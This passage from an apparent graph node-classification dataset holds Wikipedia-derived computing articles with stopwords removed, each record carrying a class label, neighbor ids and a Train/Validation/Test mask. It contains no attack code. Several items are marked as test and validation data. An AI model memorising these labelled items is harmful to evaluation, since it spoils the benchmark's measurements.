    "text": "Erik_Laykin:erik laykin erik laykin born 1964 los angeles california computer forensics expert cyber-crime investigator erik laykin past president pacific rim director l.a. fbi infragard program well chairman advisory board ec-council electronic commerce council laykin served expert witness court technology investigations co-founder online security inc. charlie balot mid-1990s established initial computer forensic capabilities behalf american investigative agencies kroll inc. investigative group international pinkerton investigations established first commercial computer forensic labs los angeles chicago hong kong catering legal corporate community director navigant consulting inc. nyse nci 2004 2008 established information technology investigations practice worked noted industry leaders jennifer baker james gordon managing director duff phelps llc 2008 co-practice chair global electronic discovery investigations practice led data forensics ediscovery investigative team 2009–2010 behalf court-appointed lehman brothers bankruptcy examiner anton valukis chairman jenner block whose extensive report brought light lehman brothers usage repo 105 laykin appointed california insurance commissioner gubernatorial candidate steve poizner california department insurance anti-fraud task force chaired technology committee laykin featured 2010 history channel e network series partners crime episode control-alt-delete highlighted number high tech investigations asia program syndicated crime investigation network south east asia throughout asia laykin featured 2013 smithsonian channel series forensic firsts catching criminals chronicles variety investigations utilize forensic sciences legal selected laykin one 50 top global digital forensic experts 2014,2015 2016 calling authority e-discovery digital forensics laykin contributing author life death dotcom china published asia law practice 2000 laykin book investigative computer forensics published john wiley sons 2013",
    "neighbors": [
      7968,
      4834,
      5475,
      5284,
      2437,
      7525,
      9319,
      6475,
      11182,
      830,
      4049,
      4789,
      8635,
      2494
    ],
    "mask": "Validation"
  },
  {
    "node_id": 11643,
    "label": 2,
    "text": "Michael_Tiemann:michael tiemann michael tiemann vice president open source affairs red hat inc. former president open source initiative chief technical officer red hat served number boards including embedded linux consortium gnome foundation advisory board board directors activestate tool corp also co-owner amy tiemann manifold recording studios co-founded cygnus solutions 1989 programming contributions free software include authorship gnu c++ compiler work gnu c compiler gnu debugger tiemann featured 2001 documentary revolution os opensource.com profiled 2014 calling one open source great explainers earned bachelor degree moore school electrical engineering 1986 university pennsylvania",
    "neighbors": [
      1026,
      9353,
      5644,
      4367,
      8848,
      657,
      1553,
      1939,
      10642,
      2581,
      3478,
      6808,
      7450,
      2974,
      6302,
      7584,
      11297,
      802,
      5410,
      6691,
      6947,
      8354,
      5931,
      8364,
      1717,
      823,
      10172,
      2109,
      11069,
      10687,
      10822,
      8263,
      843,
      589,
      6352,
      4177,
      10961,
      8147,
      8787,
      4437,
      11602,
      6489,
      3802,
      5723,
      8539,
      4831,
      9696,
      4961,
      11232,
      5988,
      5096,
      9455,
      7793,
      1394,
      1396,
      3189,
      4729,
      3582
    ],
    "mask": "Test"
  },
  {
    "node_id": 11644,
    "label": 2,
    "text": "DynamoRIO:dynamorio dynamorio bsd licensed dynamic binary instrumentation framework development dynamic program analysis tools dynamorio targets user space applications android linux windows operating systems running aarch32 ia-32 x86-64 instruction set architectures dynamorio originally created dynamic binary optimization system since used security debugging analysis tools dynamorio originated collaboration hewlett-packard dynamo optimization system runtime introspection optimization rio research group mit hence combined name dynamorio first released publicly proprietary binary toolkit june 2002 later open-sourced bsd license january 2009 dynamorio process virtual machine redirects program execution original binary code copy code instrumentation carries actions desired tool added copy changes made original program need specially prepared way dynamorio operates completely run time handles legacy code dynamically loaded libraries dynamically generated code self-modifying code dynamorio monitors control flow capture entire execution target program monitoring adds overhead even tool present dynamorio average overhead 11 percent dynamorio api abstracts away details virtualization process focuses monitoring modifying dynamic code stream program tool insert trampolines program invoke tool actions specific program points tool also insert instrumentation assembly language level provides fine-grained control tool actions tool performance dynamorio supports adaptive optimization adaptive instrumentation allowing tool remove modify instrumentation point throughout execution target program dynamorio invokes tool-registered callbacks number common program event points thread creation library loading system calls signals exceptions api also allows inspecting program libraries address space addition code dynamorio api event callbacks designed cross-platform enabling tool code operate windows linux ia-32 x86-64 dynamorio ensures tool transparency isolating tool resources stack memory file accesses program upon tool operating dynamorio contains libraries extend api provide symbol table access function wrapping replacing memory address tracing utilities first tools built dynamorio focused dynamic optimization number research tools built variety purposes including taint checking profiling applying dynamorio security field resulted technique called program shepherding program shepherding instrumentation monitors origin program instruction control flow instructions order prevent security exploit taking control program 2003 program shepherding commercialized brand-named memory firewall host intrusion prevention software startup company called determina determina acquired vmware august 2007 dr. memory open-source memory debugger built dynamorio released lgpl license dr. memory monitors memory allocations memory accesses using shadow memory detects memory-related programming errors accesses uninitialized memory accesses freed memory heap overflow underflow memory leaks feature set similar valgrind-based memcheck tool though operates windows well linux twice fast memcheck",
    "neighbors": [
      10016,
      5380,
      3048,
      5384,
      6153,
      9320,
      5356,
      6477,
      814,
      815,
      4112,
      5040,
      7983,
      8401,
      11624,
      823,
      477,
      5598
    ],
    "mask": "Test"
  },
  {
    "node_id": 11645,
    "label": 2,
    "text": "Access_register:access register ibm terminology access registers hardware registers processor work conjunction general purpose registers giving address space access data spaces address spaces order retrieve data ars introduced mvs/esa",
    "neighbors": [
      1801,
      2226,
      3323,
      5598
    ],
    "mask": "Validation"
  },
  {
    "node_id": 11646,
    "label": 7,
    "text": "Workday,_Inc.:workday inc. workday inc. on‑demand cloud-based financial management human capital management software vendor founded david duffield founder former ceo erp company peoplesoft former peoplesoft chief strategist aneel bhusri following oracle hostile takeover peoplesoft 2005 october 2012 launched successful initial public offering valued company 9.5 billion workday founded march 2005 launched november 2006 initially funded duffield venture capital firm greylock partners december 2008 workday moved headquarters walnut creek california pleasanton california peoplesoft founder duffield prior company located february 6 2008 workday announced reached definitive agreement purchase cape clear software may 2008 workday signed large contract flextronics provide human capital management software services large multinational companies publicly disclosed contracts deployments workday include aviva chiquita brands cae inc. fairchild semiconductor rentokil initial thomson reuters time warner april 29 2009 workday announced secured 75 million funding led new enterprise associates existing investors greylock partners workday ceo co‑founder dave duffield also participated round october 24 2011 workday announced 85 million new funding bringing total capital raised 250 million investors latest round included t. rowe price morgan stanley investment management janus bezos expeditions personal investment entity amazon ceo founder jeff bezos spring 2012 workday 310 customers ranging mid-sized businesses fortune 500 companies october 2012 workday launched initial public offering ipo new york stock exchange ticker symbol wday shares priced 28 ended trading friday october 12 48.69 propelled start-up market capitalization nearly 9.5 billion including unexercised stock options sold 22.75 million class shares raising 637 million ipo raised cash launch u.s. technology sector since facebook 16 billion ipo may 2012 shares surged 74 ipo underscoring investor interest cloud computing ceo workday aneel bhusri partner greylock partners handled senior leadership positions earlier career peoplesoft dave duffield serves chairman board workday makes money selling subscriptions services rather selling software outright expenses booked front signs new customer associated revenue recognized life multiyear agreements first quarter 2016 workday announced annual revenue excess 1 billion first time ever fiscal year 2016 duffield holds voting rights workday shares worth 3.4 billion bhusri held rights shares valued 1.3 billion collectively hold 67 company voting shares voting structure makes event hostile takeover much less likely workday released 32 updates product line march 2019 releases major update every 6 months every september march workday adopted ibm cloud primary development testing platform order accelerate worldwide expansion february 2014 workday acquired startup identified artificial intelligence syman create insight apps line products first products running syman announced workday rising 2014 july 2017 workday ceo aneel bhusri announced company decided open platform developers partners third party software result workday enter platform service paas market bhusri said move allow customers build custom extensions applications work workday january 2018 workday announced acquired skipflag makers ai knowledge base builds company internal communications 2013 workday participated round funding big data analytics platform datameer 2014 workday also participated anaplan 100m funding 2017 workday participated duo security 70m funding",
    "neighbors": [
      1539,
      526,
      4623,
      11280,
      10265,
      5662,
      5666,
      9766,
      39,
      5159,
      3121,
      5681,
      10820,
      11333,
      4683,
      590,
      1102,
      7248,
      5202,
      4194,
      5732,
      2170,
      9863,
      4236,
      7820,
      10893,
      8865,
      6307,
      2217,
      6834,
      9906,
      7352,
      4289,
      3269,
      1224,
      8921,
      6367,
      2795,
      3819,
      5371,
      253,
      8446,
      8451,
      272,
      2328,
      4377,
      8986,
      11038,
      6444,
      8495,
      11070,
      8515,
      8520,
      4429,
      1362,
      7512,
      9569,
      3428,
      10090,
      8044,
      5499,
      6018,
      6027,
      911,
      1935,
      8592,
      405,
      2965,
      5553,
      10681,
      448,
      2496,
      11201,
      9682,
      467,
      5587,
      10200,
      6618,
      8668,
      6632,
      1001,
      7660,
      10735,
      8191
    ],
    "mask": "None"
  },
  {
    "node_id": 11647,
    "label": 5,
    "text": "Bonjour_Sleep_Proxy:bonjour sleep proxy apple bonjour sleep proxy service open source component zero configuration networking designed assist reducing power consumption networked electronic devices device acting sleep proxy server respond multicast dns queries another compatible device gone low power mode low-power-mode device remains asleep sleep proxy server responds multicast dns queries sleep proxy server sees query requires low-power-mode device wake sleep proxy server sends special wake-up-packet magic packet low-power-mode device finally communication parameters updated via multicast dns normal communications proceed apple inc. describes service bonjour sleep proxy support documents service supports wake demand feature first offered mac os x snow leopard sleep proxy service responds address resolution protocol requests behalf low-power-mode device sleep proxy sees ipv4 arp ipv6 nd request one sleeping device addresses answers behalf sleeping device without waking giving mac address current temporary owner address may appear confusing network administrators expecting behaviour changing mac addresses case low-power-mode device communicating via wi-fi wake-up-packet sent via wireless multimedia extensions wmm possible previous implementations wake lan wol wireless hardware must updated enough include wmm support apple provides instructions checking compatibility feature macintosh computers sleep proxy service able advertise bonjour-supported services host computer sleeps examples supported services stuart cheshire page describing steps troubleshooting sleep proxy service implementations local area network seen bonjour browser",
    "neighbors": [
      10242,
      3847,
      649,
      9868,
      3218,
      9365,
      10005,
      11413,
      5402,
      5531,
      3742,
      10271,
      9380,
      2085,
      9381,
      3751,
      3752,
      10924,
      562,
      2996,
      9909,
      10171,
      4797,
      5181,
      3133,
      3006,
      5437,
      7364,
      2887,
      8265,
      2509,
      4687,
      5843,
      2904,
      5469,
      5470,
      5471,
      5472,
      7519,
      7908,
      10341,
      10344,
      4457,
      11112,
      367,
      8432,
      7411,
      6651
    ],
    "mask": "Train"
  },
  {
    "node_id": 11648,
    "label": 2,
    "text": "DemoLinux:demolinux demolinux one first live cd linux distributions created roberto di cosmo vincent balat jean-vincent loddo 1998 demolinux cd created make possible use linux without install hard disk first linux live cd making possible use system graphic mode without stage configuration many live cd linux distributions today one consider demolinux ancestor knoppix demolinux offered users hundreds applications among kde staroffice thanks compressed file system cd could used without modification hard disk user possibility use transparent way space disc store personal data even install new applications using standard tools base distribution version 1 based mandrake linux mandriva linux versions 2 3 used mechanism independent distribution distributed mainly debian basis last versions made possible moreover install linux hard disk thus offering simple installation procedure debian principle used today linux distributions demolinux distributed many computer magazines several countries still downloadable official website evolved since 2002",
    "neighbors": [
      8837,
      7435,
      10127,
      2321,
      4887,
      10394,
      673,
      3745,
      10530,
      9253,
      10149,
      3369,
      11305,
      7854,
      2738,
      4790,
      439,
      56,
      59,
      3903,
      4673,
      2375,
      4039,
      8907,
      1110,
      9693,
      2914,
      6371,
      485,
      3685,
      9064,
      4841,
      6890,
      7913,
      7020,
      10860,
      7534,
      2671,
      7920,
      8177,
      9074,
      9461,
      6393,
      11388,
      8957,
      1150
    ],
    "mask": "None"
  },
  {
    "node_id": 11649,
    "label": 3,
    "text": "Macintosh_Portable:macintosh portable macintosh portable portable computer designed manufactured sold apple computer inc. september 1989 october 1991 first battery-powered macintosh garnered significant excitement critics sales customers quite low featured fast sharp expensive black white active matrix lcd screen hinged design covered keyboard machine use portable one early consumer laptops employ active matrix panel expensive initial powerbook line powerbook 170 used one due high cost cursor pointing function handled built-in trackball could removed located either side keyboard used expensive sram effort maximize battery life provide instant low power sleep mode machine designed deliver high performance cost price weight unlike later portable computers apple manufacturers battery wired series ac power supply possible alternative direct connection ac supply flat battery meant computer could operated original power supply low output several popular unauthorized workarounds devised including use power supply powerbook 100 series provides higher output automotive batteries sealed lead acid cells used portable failed fully discharged batteries longer manufactured rare find original battery hold charge allow computer start possible repack battery new cells use alternative 6 v batteries three lead-acid cells inside battery manufactured gates energy products enersys also used quantum 1 battery packs photographic flash use despite dramatic improvement terms ergonomics offered responsiveness sharpness uniformity active matrix panel one drawbacks portable poor readability low light situations consequently february 1991 apple introduced backlit macintosh portable model m5126 along new screen apple changed sram memory less expensive power-hungry pseudo-sram reduced total ram expansion 8 mb lowered price backlight feature welcomed improvement unfortunately reduced battery life half upgrade kit also offered earlier model well plugged rom expansion slot portable discontinued october 1991 addition 16 pounds 7.2 kilograms 4 inches 10 centimetres thick portable heavy bulky portable computer main contributor weight bulk portable lead-acid batteries three drive configurations available macintosh portable one floppy drive two floppy drives hard drive floppy drive floppy drive macintosh portable 1.44 mb macintosh portable units came hard drive custom-engineered conner cp-3045 known apple hard disk 40sc holds 40 mb data consumes less power compared hard drives time proprietary scsi connector adapters allow standard scsi drives used portable exist expensive macintosh portable powerbook 100 run macintosh system 6.0.4 system 7.5.5 may 2006 pc world rated macintosh portable seventeenth worst tech product time contrast macuser magazine noted machine tended remain relevant therefore tended long usage lifespan bought reducing total cost ownership",
    "neighbors": [
      7697,
      4114,
      6165,
      11289,
      7706,
      8222,
      1057,
      6183,
      1576,
      4139,
      7211,
      1592,
      8253,
      576,
      1090,
      4180,
      10838,
      10840,
      9312,
      7269,
      8806,
      6258,
      10357,
      4220,
      10365,
      10878,
      6783,
      4741,
      8842,
      6283,
      7824,
      147,
      7830,
      6807,
      4258,
      7842,
      7844,
      7869,
      8893,
      8896,
      4807,
      4810,
      1744,
      3293,
      9952,
      6884,
      6377,
      1772,
      1776,
      6896,
      10481,
      1290,
      781,
      4879,
      784,
      2839,
      8480,
      10023,
      4910,
      7983,
      11066,
      9022,
      10562,
      8525,
      2388,
      8534,
      3928,
      8540,
      6495,
      8544,
      11629,
      11118,
      10608,
      9084,
      7549,
      3977,
      6539,
      1428,
      3483,
      2979,
      11171,
      8109,
      446,
      5058,
      10691,
      1482,
      6608,
      8662,
      9174,
      10199,
      8665,
      9182,
      2023,
      5616,
      6130,
      2551,
      2553,
      8700,
      1534
    ],
    "mask": "Test"
  },
  {
    "node_id": 11650,
    "label": 8,
    "text": "Extensible_User_Interface_Protocol:extensible user interface protocol extensible user interface protocol xup proposed web standard xup soap-based protocol communicating events user interface user interface described xml document specification limit format xml document event model used communicating xup examples given specification possible user interface languages include xhtml wireless markup language xul xup specification submitted world wide web consortium w3c consortium member martsoft corporation march 2002. w3c note meaning w3c committed developing standard potential recommendation hosted informational purposes",
    "neighbors": [
      4768,
      7455,
      6629,
      8070,
      6775,
      7943,
      10791,
      5907,
      10611,
      4213,
      502,
      119,
      2296,
      10486,
      8923,
      124,
      10910,
      479
    ],
    "mask": "Test"
  },
  {
    "node_id": 11651,
    "label": 1,
    "text": "SpatiaLite:spatialite spatialite spatial extension sqlite providing vector geodatabase functionality similar postgis oracle spatial sql server spatial extensions although sqlite/spatialite n't based client-server architecture adopt simpler personal architecture i.e whole sql engine directly embedded within application complete database simply ordinary file freely copied even deleted transferred one computer/os different one without special precaution spatialite extends sqlite existing spatial support cover ogc sfs specification n't necessary use spatialite manage spatial data sqlite implementation r-tree indexes geometry types spatialite needed advanced spatial queries support multiple map projections spatialite provided natively linux windows software library well several utilities incorporate spatialite library utilities include command line tools extend sqlite spatial macros graphical gui manipulating spatialite databases data simple desktop gis tool browsing data single binary file spatialite also used gis vector format exchange geospatial data spatialite supports several open standards ogc listed reference implementation proposed geopackage standard",
    "neighbors": [
      580,
      5546,
      8554,
      6797,
      7983,
      11030,
      823,
      4058,
      3454
    ],
    "mask": "Test"
  },
  {
    "node_id": 11652,
    "label": 2,
    "text": "GNO/ME:gno/me gno multitasking environment also known gno/me gno short unix-like operating system apple iigs computer developed procyon enterprises sold commercially 1991 august 1996 released freeware development continued devin reade released current version 2.0.6 15 february 1999 source code since released via github. ref name= gno/me source /ref",
    "neighbors": [
      2179,
      7364,
      7983,
      5492,
      5397,
      11221
    ],
    "mask": "Train"
  },
  {
    "node_id": 11653,
    "label": 4,
    "text": "Entrust:entrust entrust inc. 130 million privately owned software company 350 employees originally spin-off nortel secure networks division provides identity management security software services areas public key infrastructure pki multifactor authentication secure socket layer ssl certificates fraud detection digital certificates mobile authentication prior acquired datacard entrust headquartered dallas-fort worth metroplex also offices ottawa london tokyo washington d.c. cities internationally entrust reports customers public private organizations 60 countries 125 patents either granted pending areas authentication physical/logical access certificates e-content delivery citizen identities previously publicly traded company july 2009 entrust acquired thoma bravo u.s.-based private equity firm 124 million december 2013 datacard group announced acquisition entrust inc. subsequently rebranded entrust datacard datacard group finalized acquisition entrust december 2013 private equity firm thoma bravo chertoff capital wholly owned subsidiary chertoff group centerview partners acted financial advisors entrust september 2008 entrust participated epassports eac conformity interoperability tests prague czech republic facilitated consortium european commission brussels interoperability group big european commission joint research centre prague tests allowed european countries verify conformance second-generation epassports containing fingerprint biometric data protected extended access control functions commonly referred eac additional testing included verification crossover interoperability eac inspection systems epassports different countries prior becoming private-equity company entrust included russell 3000 index july 2008 july 2007 entrust contributed pki technology open-source community sun microsystems inc. mozilla foundation specifically entrust supplied certificate revocation list distribution points crl-dp patent 5,699,431 sun royalty-free license incorporation capability mozilla open-source libraries july 2006 entrust acquired business signatures corporation supplier non-invasive fraud detection solutions 50 million usd gaap accounting perspective total purchase price approximately 55.0 million including assumed stock options transaction expenses net asset value business signatures founded 2001 redwood city california former executives oracle hp cisco originally funded texas pacific group walden international ram shriram google dave roux silver lake partners company 40 employees acquisition entrust acquired orion security solutions supplier public key infrastructure services june 2006 mid-2004 entrust acquired amikanow corporation content scanning analysis compliance technology technology designed automatically analyze categorize email message document content based contextual meaning rather pre-defined word lists policies customized suit corporate environment automatically enforced boundary aimed compliance privacy securities laws including hipaa gramm-leach-bliley act personal information protection electronic documents act various u.s. securities exchange commission sec regulations april 2002 entrust pki technology served foundation prototype united states federal bridge certification authority fbca federal bridge certificate authority fundamental element trust infrastructure provides basis intergovernmental cross-governmental secure communications entrust pki interoperable major fbca vendors may 2000 entrust acquired encommerce provider authentication authorization technologies 1994 entrust built sold first commercially available pki",
    "neighbors": [
      3521,
      513,
      9665,
      517,
      9221,
      8615,
      2154,
      5834,
      10831,
      2354,
      9394
    ],
    "mask": "Test"
  },
  {
    "node_id": 11654,
    "label": 2,
    "text": "Matt_Lee_(artist):matt lee artist matt lee born july 21 1981 british artist comedian director software freedom activist hacker writer free software developer previously gitlab formerly technical lead creative commons 2014-2016 speaker webmaster gnu project also founded gnu social gnu fm projects 2008 2012 lee main contact behind free software foundation defective design play ogg campaigns also served chief-webmaster gnu project 2007 lee wrote produced happy birthday gnu starring stephen fry short film commemorate 25th anniversary gnu project final product released creative commons license 2015 co-wrote directed first feature orang-u ape goes college lee currently delivers speeches following topics english",
    "neighbors": [
      2050,
      7938,
      1028,
      2180,
      4230,
      7812,
      4360,
      8326,
      9865,
      4493,
      1939,
      2195,
      1813,
      11155,
      2332,
      10012,
      1694,
      10780,
      3744,
      802,
      3618,
      4265,
      4011,
      11180,
      9646,
      6962,
      5555,
      823,
      2233,
      9148,
      9660,
      10687,
      10817,
      8258,
      10822,
      5703,
      5833,
      5067,
      4561,
      8147,
      1112,
      3674,
      2010,
      7904,
      1761,
      8673,
      9696,
      10464,
      3817,
      4841,
      9579,
      10860,
      1007,
      8304,
      1394,
      8436,
      3068,
      5759
    ],
    "mask": "Test"
  },
  {
    "node_id": 11655,
    "label": 2,
    "text": "Nokia_N95:nokia n95 nokia n95 smartphone produced nokia part nseries line portable devices announced september 2006 released market march 2007 n95 ran s60 3rd edition symbian os v9.2 two-way sliding mechanism used access either media playback buttons numeric keypad first released silver later black limited edition quantities gold purple launch price n95 around n95 high-end model marketed multimedia computer much like nseries devices featured then-high 5 megapixel resolution digital camera carl zeiss optics flash well then-large display measuring 2.6 inches also nokia first device built-in global positioning system gps receiver used maps turn-by-turn navigation first accelerometer also one earliest devices market supporting hsdpa 3.5g signals introduction original model technically named n95-1 several updated versions released notably n95 8gb 8 gigabytes internal storage larger display improved battery 'classic n95 upgraded variant n95 8gb widely considered breakthrough technologies time well noted camera gps mapping capabilities innovative dual-slider hailed one best mobile devices released phone unveiled 26 september 2006 nokia open studio 2006 event new york city considered turning point mobile industry due various capabilities however device took long finally released almost 6 months 8 march 2007 nokia shipping n95 key european asian middle eastern markets sale many countries week 11 march n95 still available limited quantities early stage therefore price briefly raised 800 euros 7 april 2007 n95 went sale united states nokia flagship stores new york chicago nokia nseries.com website us carriers expected offer phone u.s. version started retailing without carrier branding discounts nokia flagship stores new york chicago 26 september 2007 29 august 2007 two updated versions n95 announced press event london first n95-2 n95 8 gb updated version european/asian markets 8 gigabytes internal storage larger screen secondly n95-3 n95 nam replacing original 2100 mhz w-cdma air interface support 850 mhz 1900 mhz frequencies used 3g networks gsm-compatible mobile carriers americas including mobility finally later 7 january 2008 nokia introduced n95-4 us 8 gb version n95-3 phone got fcc approval 30 january launched 18 march first carrier utilise approval rogers wireless may 2009 also ces 2008 red-coloured limited edition nokia n95 announced released year n95 main competitors lifetime lg prada apple iphone sony ericsson w950i k850 n95 managed outsell rivals despite apple much-hyped iphone multi-touch technology thin design advanced web capabilities n95 several key features iphone camera flash video camera bluetooth file sharing 3g 3.5g connectivity gps third-party applications several features even release later nseries phones n95 retail price still around early 2010 despite three-year old age n95 contained integrated gps receiver located 0 key keypad phone ships nokia maps navigation software box n95 supported audio mp3 wma realaudio sp-midi aac+ eaac+ midi amr m4a formats two-way slide opened towards keypad allowed access media playback buttons standard 3.5 mm jack located left side phone allowed user connect standard headphones unit ad-43 headset adapter n95 introduced support multiple remote control buttons headset users also use bluetooth audio output using a2dp use built-in stereo speakers n95 also capable playing video 3gp mpeg4 realvideo newer firmware flash video formats phone video output could also played tv-out feature tv-out feature offered phones omap processor allowed users connect smartphone using supplied cable tv composite video input main purpose allow users show photos videos large screen n95 built upnp capabilities also allowed user share phones media wlan network provides easy access photos music videos stored phone upnp capable devices network enabling watched downloaded air n95 built-in wi-fi could access internet 802.11b/g wireless network n95 could also connect internet carrier packet data network umts hsdpa edge webkit-based browser displayed full web pages opposed simplified pages phones web pages may viewed portrait landscape mode automatic zooming supported n95 also built-in bluetooth works wireless earpieces use bluetooth 2.0 technology file transfer original n95 support us based versions umts/hsdpa umts features versions phone disabled default furthermore later n95 us versions support 850/1900 mhz umts/hsdpa bands neither 1700 mhz t-mobile usa 2100 mhz bands supported internationally phone could also act wan access point allowing tethered pc access carrier packet data network voip software functionality also included phone though carriers opted remove feature n95 included built-in accelerometer originally used video stabilization photo orientation keep landscape portrait shots oriented taken nokia research center allowed application interface directly accelerometer allowing software use data nokia released step counter application demonstrate another nokia-created application taking advantage accelerometer nokia sports tracker third-party programs created including software automatically change screen orientation phone tilted program simulates sounds star wars lightsaber phone waved air program allowing user mute phone turning face-down etc n95 compatible n-gage mobile gaming service n95 much talked announcement initially viewed niche feature-packed device however became huge sales success nokia released regions 7 million nokia n95 units sold end 2007 q1 2008 report nokia claimed 3 million n95 including 8gb variant units shipped quarter bringing total least 10 million managed outsell rivals lg viewty iphone camera capabilities put competition phones sony ericsson k850i december 2007 mobile gazette called best phone 2007 6 november 2007 allaboutsymbian declared n95 8gb best smartphone ever years later 24 january 2013 pc magazine described nokia n95 one best smartphones history platform slightly improved model candybar form called nokia n82 released late 2007 next year saw introduction nokia n96 revision n95 called n95 8 gb n95-2 internally known rm-320 announced 21 august 2007 put market october 2007 released black color instead silver like n95-1 new model original n95 often referred n95 classic changes compared original n95 nokia n95-3 revision n95 internally designated rm-160 designed specifically north american market also available australian south american market following changed original version main differences n95-2 n95-3 n95-4 also additional changes removal sliding lens cover camera improved battery life doubling ram 64 128 mb featuring internal name rm-245 n95-5 targeted chinese market main difference regular n95 lack 3g connectivity support yet adopted china time release absence wlan connectivity due chinese regulations n95-6 internally coded rm-321 chinese market-targeted version n95-2 lacking 3g wlan support like n95-5 table lists specifications differ versions n95 models",
    "neighbors": [
      1537,
      4609,
      8577,
      9732,
      3205,
      9359,
      1424,
      529,
      2449,
      659,
      8083,
      10770,
      5143,
      2072,
      7063,
      5274,
      5019,
      5659,
      669,
      8472,
      11545,
      4003,
      4132,
      6310,
      167,
      40,
      3626,
      5290,
      10410,
      5677,
      9262,
      10802,
      7220,
      821,
      5175,
      7866,
      1083,
      1728,
      7617,
      4291,
      7877,
      2502,
      199,
      967,
      10053,
      9163,
      9292,
      7246,
      1615,
      2383,
      4305,
      5201,
      2259,
      6996,
      7253,
      86,
      854,
      6870,
      9424,
      10583,
      5211,
      6748,
      1377,
      1633,
      9443,
      3300,
      4324,
      7399,
      8423,
      6505,
      10599,
      109,
      5998,
      1776,
      8433,
      1533
    ],
    "mask": "None"
  },
  {
    "node_id": 11656,
    "label": 2,
    "text": "Input/Output_Supervisor:input/output supervisor input/output supervisor ios ios 11 portion control program ibm mainframe os/360 successors operating systems issues privileged i/o instructions supervises resulting i/o interruptions program requests i/o device operations normal abnormal conclusion operations ios two purposes facilitate handling i/o requests interruptions ios divided two primary program sections csects primary sections resident main storage provide control program support normal execution channel programs secondary program sections also csects termed error recovery procedures erps one exception located external storage brought main storage recovery abnormal execution channel programs early instances os sections brought input/output supervisor transient area unlike os/360 control program supervisor call transient areas post-mvt instances os sections located pageable linkpack area plpa demand-paged sole exception course erp direct access storage devices must always remain resident order recover possible i/o errors ipl volume volumes contain datasets may concatenated certain system datasets ios designed around multi-programming concept whereby operations different i/o channels control units devices may managed concurrently apparently simultaneously concurrency apparent simultaneity present even basic version os pcp otherwise supports one user task underlying hardware architecture one set i/o instructions one i/o interruption accessing devices accessing resulting device status respectively available support attached i/o devices hence i/o device operations must synchronously multiplexed half-dozen privileged i/o instructions asynchronously de-multiplexed single i/o interruption ios yet entire process start finish made appear synchronous application essentially ios hypervising operating system built top os entirely within separable function specialized hypervisor sure hypervisation restricted several i/o instructions one i/o interruption mvs/370 later instances os ios also designed around multi-processing concept whereby available processors many two mvs/370 many sixteen later instances os twelve supported ibm sixteen supported amdahl effectively efficiently utilized best utilize multi-processing capability ios multi-programming implementation partitioned smaller executable units particular may executed control srb ios invoked directly programmer rather ios invoked branch entries start i/o requests interrupt handlers complete i/o requests",
    "neighbors": [
      11131,
      868,
      8966,
      9639,
      7272,
      8393,
      4586,
      7053,
      10094,
      7983,
      10958,
      8754,
      3669,
      11381,
      2616,
      7195,
      7836
    ],
    "mask": "Test"
  },
  {
    "node_id": 11657,
    "label": 3,
    "text": "Toshiba_T1000:toshiba t1000 toshiba t1000 laptop computer manufactured toshiba corporation 1987 similar specification ibm pc convertible 4.77 mhz 80c88 processor 512 kb ram monochrome cga-compatible lcd unlike convertible includes standard serial port parallel port connectors external monitor real-time clock unusually ibm compatible pc t1000 contained 256 kb rom copy ms-dos 2.11 acted small read-only hard drive alternative operating systems could still loaded floppy drive present ramdisk along earlier t1100 t1200 systems toshiba t1000 one early computers feature laptop form factor battery-powered operation pc magazine 1988 named toshiba t1000 editor choice among 12 tested portable computers one reviewer called first real dos laptop plausible replacement tandy 200 another praised durability 60,000 miles traveling incredible bargain 800 street price byte 1989 listed t1000 among excellence winners byte awards stating takes portability limit ... self-contained get still real computer handle real-world workloads noting available little 850 magazine reported many us love one issue jerry pournelle praised little gem acknowledging cost trs-80 model 100 nec pc-8201 believed get quite lot added weight price reported many writers swear t1000 david drake loves compatible software written ibm pc/xt using color graphics adapter cga display laptop battery pack must charged working laptop power",
    "neighbors": [
      6311,
      780,
      9166,
      7983,
      1776,
      4244,
      6004,
      4666,
      859,
      10749
    ],
    "mask": "None"
  },
  {
    "node_id": 11658,
    "label": 7,
    "text": "NorduGrid:nordugrid nordugrid collaboration aiming development maintenance support free grid middleware known advanced resource connector arc name nordugrid first became known 2001 short project called nordic testbed wide area computing data handling funded nordic council ministers via nordunet2 programme project main goal set prototype distributed computing infrastructure testbed aiming primarily needs high energy physics researchers atlas experiment following evaluation existing grid technology solutions nordugrid developers came alternative software architecture implemented demonstrated may 2002 soon became known nordugrid middleware 2004 middleware solution given proper name advanced resource connector arc may 2003 nordugrid headquarters niels bohr institute 5th nordugrid workshop decided move oslo university present-day formal collaboration established 2005 five nordic academic institutes niels bohr institute copenhagen denmark helsinki institute physics finland oslo university norway lund uppsala universities sweden goal develop support maintain popularize arc deployment support nordic grid infrastructure became responsibility ndgf project launched june 2006 marked clear separation grid middleware providers infrastructure services providers support arc development nordugrid several interested partners secured dedicated funding eu fp6 project knowarc nordugrid collaboration based upon non-binding memorandum understanding open new members nordugrid collaboration consortium behind arc middleware key goal ensure arc developed maintained supported widely deployed remaining free open-source software suitable wide variety high-throughput grid computational tasks ultimate goal provide reliable scalable portable full-featured solution grid infrastructures conformant open standards primarily developed framework open grid forum arc software development may often take place outside nordugrid collaboration coordinates contributions code maintains code software repositories well build system issue tracking system necessary software development services nordugrid defines strategical directions development arc ensures financial support term arc community used refer various groups people willing share computational resources via arc tit-for-tat user group formalized virtual organisation vo allowing mutual use community resources contrary popular belief nordugrid members required provide computing storage resources neither offering resources grants automatic membership still arc community whole owns substantial amount computing storage resources voluntarily basis purpose open-source development process community members may donate cpu cycles storage space developers testers resources constitute testbed arc middleware donated community resources nordugrid provide allocate computational resources coordinate worldwide deployment arc actual deployment usage arc-based distributed computing infrastructures coordinated respective infrastructure projects e.g ndgf swegrid sweden material sciences national grid infrastructure m-grid finland norgrid norway etc.. apart contributing computational resources many groups develop higher-level software tools top arc e.g. kind development coordinated nordugrid assistance provided collaboration upon request nordugrid certification authority ca currently major infrastructure service provided nordugrid authority issues electronic certificates users services work grid environments present day grid implementations require x.509 certificates validate identity grid participants nordugrid ca provides certificates individuals machines associated research and/or academic institutions denmark finland norway sweden nordugrid certification authority member european policy management authority grid authentication eugridpma",
    "neighbors": [
      10721,
      5956,
      5414,
      198,
      3849,
      5654,
      11353,
      8122,
      7935
    ],
    "mask": "Test"
  },
  {
    "node_id": 11659,
    "label": 4,
